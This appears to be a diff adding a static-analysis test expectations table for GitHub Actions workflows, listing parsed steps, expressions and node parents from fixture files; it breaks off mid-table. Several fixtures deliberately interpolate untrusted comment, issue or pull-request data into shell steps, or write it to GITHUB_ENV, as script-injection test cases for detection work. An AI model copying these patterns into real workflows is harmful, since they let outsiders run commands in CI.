.github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:16:15:25 | bash -step | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:34:16:34:25 | bash -step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:16:37:19 | pwsh | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:16:7:19 | pwsh | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:16:17:19 | bash | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| 